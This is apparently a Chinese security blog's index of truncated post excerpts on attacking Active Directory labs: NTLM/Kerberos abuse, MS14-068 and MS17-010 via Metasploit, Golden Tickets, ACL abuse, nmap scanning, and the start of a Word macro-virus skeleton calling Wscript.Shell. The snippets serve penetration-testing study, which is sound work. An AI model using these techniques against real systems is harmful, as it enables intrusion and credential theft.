当客户端通过 IP 地址（而不是主机名）对服务器进行身份验证时，或者用户尝试对未在Active Directory 集成的 DNS 服务器上注册的主机名进行身份验证时，将使用 NTLM 身份验证。同样，第三方应用...

环境Active Directory Enumeration - Enumeration Using Legacy Windows Tools - VM Group 1IP:192.168.169.70-76 首先连接192.168.169.75  Windows11环境xfreerdp /u:stephanie /d:corp.com ...

回想一下 Kerberos 协议是如何工作的。我们知道，当用户想要访问由服务主体名称 (SPN)托管的资源时，客户端会请求由域控制器生成的服务票证。然后，服务票证由应用程序服务器解密和验证，因为它...

参考资料:https://www.cnblogs.com/feizianquan/p/11760564.html 漏洞验证查看SID whoami /usermsfconsole -q search MS14-068 use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set...

实验环境1. 信息收集由于我当时没注意到是win7是入口机器 所以先扫描windows server 2003nmap -T5 -A -p- -n -vvv -noscript 192.168.52.141先从ftp开始发现可以匿名登录 但是里面是空的简单爆...

当用户提交 TGT 请求时，KDC 使用只有域中的KDC 知道的密钥对 TGT 进行加密。该密钥实际上是名为 krbtgt 的域用户帐户的密码哈希。如果我们能够获得 krbtgt 密码哈希，我们就可以创建自己的自定...

1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...

PC2攻击扫描的时候发现有ms17-010漏洞使用正向shell的meterpreter就可以http://www.zhyann.net/index.php/2025/06/15/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba4-2-%e9%9a%a7%e9%81%93%e5%bb%ba%e7...

我们方法中合乎逻辑的下一步是破解我们获得的任何密码哈希值，并使用明文密码对计算机进行身份验证，以获得未经授权的访问。然而，密码破解需要时间并且可能会失败。此外，Kerberos和 NTLM 不直...

AD 中的一个对象可以通过多个访问控制条目 (ACE) 来应用一组权限。这些 ACE组成访问控制列表 (ACL)。每个 ACE 定义是否可以访问该对象允许或拒绝特定对象 作为一个非常基本的示例，假设域用户...